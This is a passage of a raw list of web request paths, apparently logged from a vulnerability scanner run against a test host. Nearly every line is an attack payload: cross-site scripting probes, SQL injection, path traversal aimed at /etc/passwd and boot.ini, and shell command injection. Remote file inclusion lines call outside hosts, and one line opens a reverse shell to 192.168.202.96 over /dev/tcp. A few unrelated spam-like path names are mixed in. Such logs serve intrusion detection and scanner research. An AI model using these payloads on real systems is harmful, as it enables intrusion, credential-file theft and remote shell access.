content=\"testkwlg=5591\">\n/javascript/zoom.exe\n/if69ddo1.cfc?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/examples/jsp/jsp2/el/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/main.php?logout=\"&ver\\xa0>q18437972&rem\\xa0\n/recordings/index.php?user_langue=../../../../../../../../../../etc/passwd\n/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini\n/top.php?stuff='\\x0duname\\x09>q21461883\\x09#\n/byrg33fw.dll?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/oie504mr.cgi?<script>document.cookie=\"testtpby=7052;\"</script>\n/lmw4r201.kspx?<script>document.cookie=\"testwews=8477;\"</script>\n/scripts/view_user.php?list=1&letter=&sort_by='select\n/main.php?logout=\"\\x0adel\\x09q98198938\\x09#\n/javascript/credit.exe\n/examples/jsp/jsp2/el/demos/demo.browse.php?filename=/etc/passwd\n/scripts/tinfo.php?id=1331923196\n/javascript/msql.exe\n/recordings/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/edv3mapy.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='&rm q78458992 #\n/scripts/cxvae_g3rjys.html\n/manager/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/3hlysl2x.dll?<script>document.cookie=\"testgjbe=8505;\"</script>\n/scripts/www/delivery/ac.php?bannerid=-1332010390+or+1=1+--+';passthru(base64_decode($_server[http_nessus_seiprcet]));die;/*\n/javascript/css.exe\n/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/index.php?op=default&date=200607' union select 1,742994120,1,1,1,1,1,1,1,1--&blogid=1\n/top.php?stuff=&uname >q61314154 #\n/cgi-exe/testcgi.exe\n/javascript/.passwd.lib\n/j2kdmfw4.pl?<script>cross_site_scripting.nasl</script>\n/databasesubscriptions/\n/fpnpp5zg.idc?<script>document.cookie=\"testyias=101;\"</script>\n/main.php?logout=&ver\\xa0>q82532752&rem\\xa0\n/subscription_center/\n/init.php?scriptpath=http://192.168.202.118:8080/ghl9il??\n/main.php?logout='\\x0duname\\x09>q37443231\\x09#\n/vuln_script/\n/g3w7y7u5.kspx?<script>document.cookie=\"testbfpq=3326;\"</script>\n/vwmg565s.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/se.exe\n/manager/webplus?script=/../../../../etc/passwd\n/top.php?stuff=\"&ver\\x09>q25218299&rem\\x09\n/examples/jsp/colors/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/top.php?stuff=\"&ver\\x09>q45798999&rem\\x09\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1332008336.php.\n/manager/webdist.cgi?distloc=;id\n/javascript/certs.exe\n/1r8cfrlf.fts?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/phpmyadmin/viewpage.php?file=/etc/passwd\n/scripts/u7m5ok8eqpfy.inc\n/help.php?q=\"ping;-w;11000;-n;1;1.2.3.4|rem;\n/index.php?src=1&_common=1&time=1331908739&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/bangkok babes-locket n' chain (2002)/\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331919007,1010516896 --\n/add-subscription/\n/examples/servlets/servlet/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/scripts/zdbyw3dn3gh2.inc\n/vwmg565s.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0adel\\x09q18289426\\x09#\n/examples/servlets/servlet/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q45534655&frm_user=&scr_height=&scr_width=\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 625315727--\n/cgi-bin/secure.php?cfgprogdir=/etc/passwd\\x00\n/top.php?stuff=\"|ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/main.php?logout=;uname\\x09>q14218261\\x09#\n/rpc.php?q='&t='\n/recordings/secure.php?cfgprogdir=/etc/passwd\\x00\n/scripts/.nsconfig\n/7uz3ok60.fts?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servletsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/examples/jsp/cal/supporter/tupdate.php?groupid=change&sg='\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/ebkkxjvdvd.sh').\"]=1\n/6qbynt4f.cfm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0adel q13387342 #\n/top.php?stuff=\"sleep 11 #\n/javascript/month.exe\n/n9xlumt5.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0duname\\x09#\n/eei78ore.dll?<script>cross_site_scripting.nasl</script>\n/javascript/tmpl.exe\n/j4oqyvga.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0auname\\x09>q69986769\\x09#\n/javascript/ping.exe\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --\n/a0imiuf1.jsp?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/php/mylog.phtml?screen=/etc/passwd\n/scripts/lpzj75ztw9lb.cgi\n/actionscript/\n/scripts/buoalakxhatu.inc\n/manager/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/en-us/account/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/main.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/hjdzm96v.x?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+52+50+33+d2+52+68+73+65+6e+64+8b+c4+52+68+72+65+63+76+8b+d4+52+51+50+51+ff++>>esbq\n/projects/1/repository/annotate?rev=`0<&97-;exec 97<>/dev/tcp/192.168.202.96/21625;sh <&97 >&97 2>&97`\n/search?ns-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/dda2qr7j.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m5103snj.nsf?<script>cross_site_scripting.nasl</script>\n/cgi-bin/way-board.cgi?db=/etc/passwd\\x00\n<script>document.cookie=\"testyrbs=2855;\"</script>\n/x7pclv4s.jsp?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/javascript/trailer.exe\n/m5103snj.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/no4ghqiguzhst??&cmd=ls\n/index.php?page=../../../../../../../../../../boot.ini\n/examples/servlets/servlet/showproduct.php?product=1'\n/miz4r5hz.php3?<script>document.cookie=\"testviqu=1270;\"</script>\n/x2gyorli.fts?<script>document.cookie=\"testwhac=3130;\"</script>\n/scripts/admin/templates/header.php?admin_root=http://xxxxxxxx.\n/g3w7y7u5.mscgi?<script>document.cookie=\"testbfpq=3326;\"</script>\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(608742635)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1145091042)</script>\n//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd\n/help.php?q='&rm\\x09q42899831\\x09#\n/d7ktpmcq.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testcrcv=6167;\"</script>\n/5o9zq43e.jsp?<script>cross_site_scripting.nasl</script>\n/xfkun1ku.cfm?<script>cross_site_scripting.nasl</script>\n/en-us/9kr0ih0v.jsp?<script>document.cookie=\"testzgnm=1183;\"</script>\n/33y9gcqq.asp?<script>document.cookie=\"testnvxc=4301;\"</script>\n/en-us/odzk29aa.dll?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/smpwservicescgi.exe\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.nsf\n/r3le3om5.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/scripts/search.pl?form=../../../../../../etc/passwd\\x00\n/g8nu2yy7.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8x6w469u.php?<script>document.cookie=\"testgfjr=1286;\"</script>\n/examples/jsp/sessions/index.php?cat='\n/en-us/s7qus4g3.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ovcgi/toolbar.exe\n/javascript/voip.exe\n/en-us/hipkz026.asp?<script>document.cookie=\"testyrbs=2855;\"</script>\n/index.php?show='\"><script>alert(413756083531)</script>\n/7u1pb2xi.pl?<script>document.cookie=\"testlwwz=718;\"</script>\n/g3w7y7u5.idc?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/help.php?q=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/javascript/h1.exe\n/606wkcop.pl?<script>cross_site_scripting.nasl</script>\n/raanw4ia.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/session_descriptions/\n/forum_arc.asp?n=c:\\boot.ini|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;c:&#039;.\n/main.php?stuff=\"&ver,>q75222715&rem,\n/top.php?stuff=\"del q17133825 #\n/cgi-perl/c32web.exe/changeadminpassword\n/?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/examples/jsp/colors/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/enscript-1/\n/aggregator \"http authentication\"/\n/e9rx3ya4.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0dsleep 8 #\n/scgi-bin/texis.exe/junk\n/d765w06j.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/cgi-local.exe\n/examples/jsp/sessions/calendar_admin.pl?config=|cat /etc/passwd|\n/xlj7h65o.fts?<script>document.cookie=\"testtbbe=856;\"</script>\n/jscripts/folder_rte_files/module_table.php?editorid=xxl\";alert(410255568179);test=\"\n/hydrocodone-prescriptions/\n/inscription_eudoranews/\n/static//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini\n/o35zot2r.do?<script>cross_site_scripting.nasl</script>\n/jdx255ea.exe?<script>document.cookie=\"testziyq=5055;\"</script>\n/login.php?clear=yes&mode=' injected_attribute=1331908866\n/javascript/repl.exe\n/examples/jsp/error/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/cgis/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/ao22ww7y.htm?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/cgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/javascript/eric.exe\n/en-us/n9xlumt5.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yef5f3d5.do?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/g8nu2yy7.cfc?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/direct.php?rf=/etc/passwd\\x00\n/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://cirt.net/rfiinc.txt?\n/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"ping,-w,9000,-n,1,1.2.3.4|rem,\n/i686v90l.nsf?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/q703m78q.cfm?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/cacti/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331923209.php.\n<meta http-equiv=set-cookie content=\"testfosd=94\">\n/phpmyadmin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/movies.exe\n/main.php?logout='sleep\\x0911\\x09#\n/miz4r5hz.html?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/en-us/9kr0ih0v.aspx?<script>document.cookie=\"testzgnm=1183;\"</script>\n/kb.php?category_id=xxl><script>alert(412556083479)</script>\n/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/thvgjebp.exe|dir\n/examples/jsp/jsp2/el/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/phentermine-prescription/\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/top.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=q34392965\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=@rfiurl?mosconfig_absolute_path=@rfiurl?\n/script-ed/\n/scripts/account/?action=login\n/main.php?logout=\";del q56278633 #\n/javascript/body.exe\n/manager/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/subscriptionoptions/\n/fmnveedu.do?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/javascript/screens.exe\n/cgi-bin/cleartrust/ct_logon.jsp?ctloginerrormsg=<script>alert(1)</script>\n/msadc/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/ny1b3qq4.fts?<script>cross_site_scripting.nasl</script>\n/javascript/document.yml\n/examples/jsp/checkbox/language.php?data_dir=/etc/passwd\\x00\n/bzuf9ozq.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/lang/lang.php?lang_path=/etc/passwd\\x00\n/bin/windmail.exe\n/uc3w3bdi.kspx?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/javascript/utility.exe\n/smf11-xss/\n/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/cgi-bin/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_lrajflyx]));die;/*\n/javascript/2.exe\n/index.php?id=0rop9yeuxw'\n/dda2qr7j.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/examples/jsp/colors/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/top.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/admin/index.php?path_to_script=http://192.168.202.96:8080/vir0v3xfc??&cmd=ls\n/help.php?q=\"&uname\\x09>q44432678\\x09#\n/main.php?stuff=\"&del\\x0bq72441193&rem\\x0b\n/worldscripture/\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331904244,4--&blog=1\n/82q7ywa8.jspa?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/main.php?stuff=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/7dbjwpw6.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/checkbox/port.php?proto=tcp'\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/chat-scripts/\n/r3le3om5.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=&ver\\x0b>q26624863&rem\\x0b\n/javascript/cgi-sys.exe\n/<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/examples/jsp/jsp2/jspx/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/uvazfs7p.mscgi?<script>document.cookie=\"testwtbo=4831;\"</script>\n/en-us/account/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/u8yiqilu.htm?<script>document.cookie=\"testswjp=6010;\"</script>\n/100 various 12' or extended versions/\n/help.php?q=\"ver&rem \n/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/s7qus4g3.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/php.cgi?/etc/passwd\n/trial-subscription/\n/ghswfouu.kspx?<script>document.cookie=\"testsqmm=5713;\"</script>\n/nmw0do67.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/home/search.asp?nchannel='1\n/scripts/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/qhvu0pdg.htm?<script>document.cookie=\"testchuc=2100;\"</script>\n/tukodz3j.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/search=<script>alert('xss')</script>\n/cgi-bin/mapserv.exe?map=mapserver_detect.nasl.map\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=@rfiurl\n/descriptions/\n/daddy's little princess - sasha knox/\n/en-us/jnv890lt.do?<script>cross_site_scripting.nasl</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/nxdfmqaalo.sh'); function v\n/bin/fpremadm.exe\n/javascript/xxx.exe\n/scripts/rihzp7swr3p6.php3\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349\n/vjbrrppi.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/edv3mapy.cgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=uname >q98617778 #\n/xlj7h65o.pl?<script>document.cookie=\"testtbbe=856;\"</script>\n/top.php?stuff=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/top.php?stuff=\"ver >q61593836&rem \n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/cacti/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/j4rdyhw8.cfm?<script>document.cookie=\"testrluj=1420;\"</script>\n/l13b77e5.mscgi?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/ls\n/localnamesdescription/\n/examples/jsp/jsp2/el/sgdynamo.exe?htname=<script>foo</script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/ghl9il?\n/cgi-sys/ion-p?page=../../../../../etc/passwd\n/<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/zoomblogxss/\n/showproduct.php?product=1'\n/www/delivery/ac.php?bannerid=-1331923190+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ywcwjzkf]));die;/*\n/scripts/sgdynamo.exe?htname=sgdynamo.exe\n/t7tm4m0b.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/myevent.php?myevent_path=/etc/passwd\\x00\n/gy23xnjq.idc?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0dsleep\\x097\\x09#\n/ny1b3qq4.exe?<script>cross_site_scripting.nasl</script>\n/javascript/the.exe\n/en-us/account/mail.php?id='/**/union/**/select/**/1,2,1331909423,4--&blog=1\n/help.php?q=\"&uname >q44114596 #\n/169okeyj.idc?<script>document.cookie=\"testxeoi=3573;\"</script>\n/javascript/orders.exe\n/0qhcnefz.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/llumt7msyau5y?'\n/index.php?template=../../../../../../../../../../boot.ini\\x00\n/fpnpp5zg.do?<script>document.cookie=\"testyias=101;\"</script>\n/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/scripts/index.php?src=1&_common=1&time=1331904242&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/1qwv2p5p.idc?<script>document.cookie=\"testvqcy=252;\"</script>\n/javascript/partner.exe\n/scripts/cxvae_g3rjys.shtml\n/en-us/account/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/manual/images/?c=d;o=a\n<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/bl8sefdm.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/main.php?stuff=&ver\\xa0>q89912332&rem\\xa0\n/x2gyorli.idc?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/examples/jsp/error/admin/configset.php?settings_dir=/etc/passwd\\x00\n/scripts/event_view.php?eid=34 union select 660865227\n/scriptaculous/\n/en-us/hipkz026.jspa?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/tag-rose\"/\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/frznctvhi0i5?\n/manager/admin/admin.php?sid='\n/bin/query?mss=../config\n/examples/jsp/jsp2/el/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\"&ver >q86234546&rem \n/scgi-bin/ion-p?page=../../../../../etc/passwd\n/if69ddo1.cgi?<script>document.cookie=\"testiabz=5220;\"</script>\n/manager/texis.exe/?-dump\n/6wb70v0b.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.html?<script>document.cookie=\"testwldz=3506;\"</script>\n/edv3mapy.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/examples/jsp/checkbox/shoutbox.php?conf=../../../../../../../../etc/passwd\n/manager/port.php?proto=tcp'\n/help.php?q=\"&ver\\x0b>q33773559&rem\\x0b\n/cgis/gwweb.exe?help=bad-request\n/scripts/biztalkhttpreceive.dll\n/kb.cgi?view='&lang=en\n/h5i6crm3.jspa?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/subscription-r0/\n/scripts/addschup\n/top.php?stuff='\\x0ddel\\x09q15742122\\x09#\n/cgi-bin/search.jsp?q=%\"<script>alert(1332009303)</script>\n/news.php?scriptpath=http://cirt.net/rfiinc.txt??\n/main.php?logout=;rm\\x09q84429989\\x09#\n/top.php?stuff=ver\\xa0>q32585215&rem\\xa0\n/en-us/account/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/wmlscript/\n/zqqemp6j.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/s7qus4g3.fts?<script>cross_site_scripting.nasl</script>\n/cacti/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/recordings/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/recordings/ftp/ftp.pl?dir=../../../../../../etc\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/whmch8ftkt7kv?\n/javascript.php?abs_path=/etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/boobsquad - daddy's girl gets stuffed/\n/manager/sgdynamo.exe?htname=<script>foo</script>\n/lmw4r201.exe?<script>document.cookie=\"testwews=8477;\"</script>\n/javascript/microsoft.exe\n/manager/pfdispaly.cgi?../../../../../../etc/passwd\n/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/en-us/account/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161\n/main.php?stuff='\\x0duname\\x09>q61875212\\x09#\n/main.php?stuff=ver\\xa0>q16977233&rem\\xa0\n/u95h6ymu.cfc?<script>document.cookie=\"testkhwc=4028;\"</script>\n/fa8p8lr8.html?<script>cross_site_scripting.nasl</script>\n/yver8r9o.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/save.exe\n/jnt3f86c.x?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/javascript/oracle.exe\n/phpmyadmin/index.php?templates_dir=/etc/passwd\\x00\n/help.php?q=\";del\\x09q21654461\\x09#\n/scripts/vhost.php?action=logout&time=1331904332\n/u8yiqilu.fts?<script>document.cookie=\"testswjp=6010;\"</script>\n/main.php?logout=&uname >q37927328 #\n/top.php?stuff=uname >q33363697 #\n/en-us/ddoworrl.jsp?<script>document.cookie=\"testvlau=8517;\"</script>\n/en-us/account/view_user.php?list=1&letter=&sort_by='select\n/examples/jsp/colors/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/qczkquis.x?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/examples/jsp/error/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/ftp/ftp.pl?dir=../../../../../../etc\n/top.php?stuff=\"|ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/cgi-win/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/bmeun223.fts?<script>document.cookie=\"testhhwu=7044;\"</script>\n/0qhcnefz.pl?<script>cross_site_scripting.nasl</script>\n/aj3pf49c.htm?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/main.php?logout='rm q43392461 #\n/addressbook/index.php?name=<script>alert('vulnerable')</script>\n/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd\\x00\n/scripts/hw3.cgi?daysonly=0).system('id').(\n/javascript/disabled.exe\n/scripts/more.php?id=1'\n/examples/jsp/jsp2/jspx/sendcard.php?view=1&id='sendcard_sql.nasl\n/fpnpp5zg.jspa?<meta http-equiv=set-cookie content=\"testyias=101\">\n/raanw4ia.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/language.php?data_dir=/etc/passwd\\x00\n/en-us/account/wikka.php?wakka=homepage/../../actions/wikkachanges\n/subscriptions.gif\n/cgi-exe/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/t3af3tdz.php?<script>cross_site_scripting.nasl</script>\n/j734qobz.nsf?<script>cross_site_scripting.nasl</script>\n/applescript_experience/\n/help.php?q=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/script/template/index.php?main_page_directory=http://192.168.202.118:8080/ghl9il?\n/scripts/shop.plx/page=nessus839333687\n/cgi-bin/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/script/\n/xlj7h65o.nsf?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/jscript.php?my_ms[root]=http://cirt.net/rfiinc.txt??\n/scripts/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/javascript/comment.exe\n/scripts/index.php?act=arcade&do=stats&gameid=1'\n/javascript/admins.exe\n/recordings/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/phpclassifieds/latestwap.php?url=<script>alert('vulnerable');</script>\n/rss_script2/\n/descriptious-populicious/\n/en-us/fo564rei.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d44uk9h2.cgi?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/servlets/servlet/zpanel.php?page=/etc/passwd\\x00\n/top.php?stuff=ping;-w;10000;-n;1;1.2.3.4|rem;\n/manager/lang/lang.php?lang_path=/etc/passwd\\x00\n/top.php?stuff=\"del\\x0bq81585151&rem\\x0b\n/x2gyorli.nsf?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/subscriptions.xsl\n/d7ktpmcq.cfc?<script>cross_site_scripting.nasl</script>\n/dda2qr7j.dll?<script>cross_site_scripting.nasl</script>\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/2aibfaczmac8?\n/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/q703m78q.nsf?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/p043snfr.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/minis.php?month=../../../../../../etc/passwd\n/undocumentedscripts/\n/vwmg565s.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/top.php?stuff=\"ver&rem,\n/help.php?q=\"&ping;-w;7000;-n;1;1.2.3.4&rem;\n/cgi-bin/config.php?path[docroot]=/etc/passwd\\x00\n/scripts/onwkbtts3uj1.php\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331904454\")</script>\n/scripts/search.jsp?q=%\"<script>alert(1331904660)</script>\n/7u1pb2xi.x?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/eei78ore.jsp?<script>cross_site_scripting.nasl</script>\n/yver8r9o.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/student.asp?msg=<script>alert(\"411666083443\");</script>\n/examples/jsp/jsp2/jspx/index.php?template=../../../loudblog/custom/config.php\\x00\n/javascript/training.exe\n/transcript_episode8/\n/phpmyadmin/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/scripts/rvckwz6smkqf.asp\n/top.php?stuff=;rm q32339198 #\n/javascript/asset.exe\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1444832703--\n/dslpwt15.asp?<meta http-equiv=set-cookie 